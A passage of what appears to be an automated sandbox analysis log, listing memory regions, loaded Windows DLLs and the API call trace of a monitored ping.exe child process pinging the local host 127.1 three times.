0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7242 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7243 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7244 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7245 start_va = 0xc50000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7246 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7247 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7248 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7301 start_va = 0xb00000 end_va = 0xb0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 7302 start_va = 0xb10000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 7303 start_va = 0xc60000 end_va = 0xcddfff entry_point = 0xc60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7304 start_va = 0xd60000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 7305 start_va = 0x73430000 end_va = 0x73450fff entry_point = 0x73430000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 7306 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7307 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7308 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7309 start_va = 0x7ea30000 end_va = 0x7eb2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea30000" filename = "" Region: id = 7310 start_va = 0xb20000 end_va = 0xb23fff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 7311 start_va = 0xbf0000 end_va = 0xbf3fff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 7312 start_va = 0x73420000 end_va = 0x7342efff entry_point = 0x73420000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Thread: id = 396 os_tid = 0x308 Process: id = "142" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x11868000" os_pid = "0x22c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7327 start_va = 0x5d0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 7328 start_va = 0x5f0000 end_va = 0x5f1fff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 7329 start_va = 0x600000 end_va = 0x60efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 7330 start_va = 0x610000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 7331 start_va = 0x650000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 7332 start_va = 0x690000 end_va = 0x693fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 7333 start_va = 0x6a0000 end_va = 0x6a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 7334 start_va = 0x6b0000 end_va = 0x6b1fff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 7335 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 7336 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7337 start_va = 0x7ed10000 end_va = 0x7ed32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed10000" filename = "" Region: id = 7338 start_va = 0x7ed3b000 end_va = 0x7ed3bfff entry_point = 0x0 region_type = private name = "private_0x000000007ed3b000" filename = "" Region: id = 7339 start_va = 0x7ed3c000 end_va = 0x7ed3efff entry_point = 0x0 region_type = private name = "private_0x000000007ed3c000" filename = "" Region: id = 7340 start_va = 0x7ed3f000 end_va = 0x7ed3ffff entry_point = 0x0 region_type = private name = "private_0x000000007ed3f000" filename = "" Region: id = 7341 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7342 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7343 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7344 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7345 start_va = 0x6e0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 7346 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7347 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7348 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7349 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 7350 start_va = 0x5e0000 end_va = 0x5e3fff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 7351 start_va = 0x6f0000 end_va = 0x76dfff entry_point = 0x6f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7352 start_va = 0x7f0000 end_va = 0x7fffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 7353 start_va = 0x830000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 7354 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 7355 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 7356 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7357 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7358 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7359 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7360 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 7361 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7362 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7363 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7364 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 7365 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7366 start_va = 0x7ec10000 end_va = 0x7ed0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec10000" filename = "" Region: id = 7367 start_va = 0x770000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 7368 start_va = 0x7b0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 7369 start_va = 0x7ed38000 end_va = 0x7ed3afff entry_point = 0x0 region_type = private name = "private_0x000000007ed38000" filename = "" Region: id = 7370 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 7371 start_va = 0x5f0000 end_va = 0x5f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 7372 start_va = 0x6c0000 end_va = 0x6c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 7373 start_va = 0x6d0000 end_va = 0x6d2fff entry_point = 0x6d0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 7374 start_va = 0x950000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 7375 start_va = 0x990000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 7376 start_va = 0x7ed35000 end_va = 0x7ed37fff entry_point = 0x0 region_type = private name = "private_0x000000007ed35000" filename = "" Thread: id = 400 os_tid = 0x988 [0130.718] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0130.718] __set_app_type (_Type=0x1) [0130.718] __p__fmode () returned 0x76ea1768 [0130.718] __p__commode () returned 0x76ea176c [0130.718] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0130.718] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0130.718] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.719] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.720] _fileno (_File=0x76ea4c28) returned 1 [0130.720] _get_osfhandle (_FileHandle=1) returned 0x28 [0130.720] GetFileType (hFile=0x28) returned 0x2 [0130.720] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x68ef30 | out: lpMode=0x68ef30) returned 0 [0130.720] GetLastError () returned 0x6 [0130.720] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x68ee94, nSize=0x50 | out: lpBuffer="䤐\x83") returned 0x0 [0130.720] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0130.722] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x68ef4c | out: phkResult=0x68ef4c*=0x88) returned 0x0 [0130.722] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x68ef40, lpData=0x68ef48, lpcbData=0x68ef44*=0x4 | out: lpType=0x68ef40*=0x0, lpData=0x68ef48*=0x0, lpcbData=0x68ef44*=0x4) returned 0x2 [0130.722] RegCloseKey (hKey=0x88) returned 0x0 [0130.722] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x68ef10*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x68ef4c | out: ppResult=0x68ef4c*=0x83c250*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x838910*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0130.722] FreeAddrInfoW (pAddrInfo=0x83c250*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x838910*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0130.722] IcmpCreateFile () returned 0x836a68 [0130.725] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x83c2a0 [0130.725] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x845270 [0130.725] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x68f048, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0130.726] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x68ef40, nSize=0x0, Arguments=0x68ef3c | out: lpBuffer="竈\x84樂h┗\x94䰨盪❋") returned 0x14 [0130.727] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.727] _fileno (_File=0x76ea4c28) returned 1 [0130.727] _get_osfhandle (_FileHandle=1) returned 0x28 [0130.727] GetFileType (hFile=0x28) returned 0x2 [0130.727] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x68ef04 | out: lpMode=0x68ef04) returned 0 [0130.727] GetLastError () returned 0x6 [0130.727] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x68ee68, nSize=0x50 | out: lpBuffer="h❋") returned 0x0 [0130.727] _fileno (_File=0x76ea4c28) returned 1 [0130.727] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0130.727] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0130.727] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x847b00 [0130.727] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x847b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0130.727] _fileno (_File=0x76ea4c28) returned 1 [0130.727] _write (in: _FileHandle=1, _Buf=0x847b00*, _MaxCharCount=0x14 | out: _Buf=0x847b00*) returned 20 [0130.727] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.727] _fileno (_File=0x76ea4c28) returned 1 [0130.727] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0130.727] LocalFree (hMem=0x847b00) returned 0x0 [0130.727] LocalFree (hMem=0x847ac8) returned 0x0 [0130.727] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x68ef40, nSize=0x0, Arguments=0x68ef3c | out: lpBuffer="竈\x84樂h▪\x94䰨盪❚") returned 0x18 [0130.727] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.727] _fileno (_File=0x76ea4c28) returned 1 [0130.727] _get_osfhandle (_FileHandle=1) returned 0x28 [0130.727] GetFileType (hFile=0x28) returned 0x2 [0130.727] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x68ef04 | out: lpMode=0x68ef04) returned 0 [0130.727] GetLastError () returned 0x6 [0130.727] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x68ee68, nSize=0x50 | out: lpBuffer="h❚") returned 0x0 [0130.727] _fileno (_File=0x76ea4c28) returned 1 [0130.727] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0130.727] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0130.727] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x83c1b0 [0130.727] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x83c1b0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0130.727] _fileno (_File=0x76ea4c28) returned 1 [0130.727] _write (in: _FileHandle=1, _Buf=0x83c1b0*, _MaxCharCount=0x18 | out: _Buf=0x83c1b0*) returned 24 [0130.727] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.727] _fileno (_File=0x76ea4c28) returned 1 [0130.727] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0130.727] LocalFree (hMem=0x83c1b0) returned 0x0 [0130.727] LocalFree (hMem=0x847ac8) returned 0x0 [0130.728] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0130.728] IcmpSendEcho2Ex (in: IcmpHandle=0x836a68, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x83c2a0, RequestSize=0x20, RequestOptions=0x68efbc, ReplyBuffer=0x845270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x845270) returned 0x1 [0130.728] InetNtopW (in: Family=2, pAddr=0x68efac, pStringBuf=0x68f0d4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0130.728] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x68ef40, nSize=0x0, Arguments=0x68ef3c | out: lpBuffer="笈\x84樂h⛔\x94䰨盪✣") returned 0x16 [0130.728] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.729] _fileno (_File=0x76ea4c28) returned 1 [0130.729] _get_osfhandle (_FileHandle=1) returned 0x28 [0130.729] GetFileType (hFile=0x28) returned 0x2 [0130.729] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x68ef04 | out: lpMode=0x68ef04) returned 0 [0130.729] GetLastError () returned 0x6 [0130.729] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x68ee68, nSize=0x50 | out: lpBuffer="h✣") returned 0x0 [0130.729] _fileno (_File=0x76ea4c28) returned 1 [0130.729] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0130.729] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0130.729] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x847b40 [0130.729] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x847b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0130.729] _fileno (_File=0x76ea4c28) returned 1 [0130.729] _write (in: _FileHandle=1, _Buf=0x847b40*, _MaxCharCount=0x16 | out: _Buf=0x847b40*) returned 22 [0130.729] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.729] _fileno (_File=0x76ea4c28) returned 1 [0130.729] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0130.729] LocalFree (hMem=0x847b40) returned 0x0 [0130.729] LocalFree (hMem=0x847b08) returned 0x0 [0130.729] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x68ef40, nSize=0x0, Arguments=0x68ef3c | out: lpBuffer="笈\x84樂h⛿\x94䰨盪✼") returned 0x9 [0130.729] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.729] _fileno (_File=0x76ea4c28) returned 1 [0130.729] _get_osfhandle (_FileHandle=1) returned 0x28 [0130.729] GetFileType (hFile=0x28) returned 0x2 [0130.729] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x68ef04 | out: lpMode=0x68ef04) returned 0 [0130.729] GetLastError () returned 0x6 [0130.729] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x68ee68, nSize=0x50 | out: lpBuffer="h✼") returned 0x0 [0130.729] _fileno (_File=0x76ea4c28) returned 1 [0130.729] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0130.729] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.729] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x838970 [0130.729] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x838970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0130.729] _fileno (_File=0x76ea4c28) returned 1 [0130.729] _write (in: _FileHandle=1, _Buf=0x838970*, _MaxCharCount=0x9 | out: _Buf=0x838970*) returned 9 [0130.729] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.729] _fileno (_File=0x76ea4c28) returned 1 [0130.729] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0130.729] LocalFree (hMem=0x838970) returned 0x0 [0130.729] LocalFree (hMem=0x847b08) returned 0x0 [0130.729] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x68ef44, nSize=0x0, Arguments=0x68ef40 | out: lpBuffer="笈\x84樂h➷\x94䰨盪✧") returned 0x9 [0130.729] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.729] _fileno (_File=0x76ea4c28) returned 1 [0130.729] _get_osfhandle (_FileHandle=1) returned 0x28 [0130.729] GetFileType (hFile=0x28) returned 0x2 [0130.729] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x68ef08 | out: lpMode=0x68ef08) returned 0 [0130.729] GetLastError () returned 0x6 [0130.729] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x68ee6c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0130.729] _fileno (_File=0x76ea4c28) returned 1 [0130.729] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0130.729] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.729] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x838a60 [0130.729] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x838a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0130.730] _fileno (_File=0x76ea4c28) returned 1 [0130.730] _write (in: _FileHandle=1, _Buf=0x838a60*, _MaxCharCount=0x9 | out: _Buf=0x838a60*) returned 9 [0130.730] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.730] _fileno (_File=0x76ea4c28) returned 1 [0130.730] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0130.730] LocalFree (hMem=0x838a60) returned 0x0 [0130.730] LocalFree (hMem=0x847b08) returned 0x0 [0130.730] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x68ef40, nSize=0x0, Arguments=0x68ef3c | out: lpBuffer="笈\x84樂h⟘\x94䰨盪✨") returned 0x9 [0130.730] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.730] _fileno (_File=0x76ea4c28) returned 1 [0130.730] _get_osfhandle (_FileHandle=1) returned 0x28 [0130.730] GetFileType (hFile=0x28) returned 0x2 [0130.730] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x68ef04 | out: lpMode=0x68ef04) returned 0 [0130.730] GetLastError () returned 0x6 [0130.730] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x68ee68, nSize=0x50 | out: 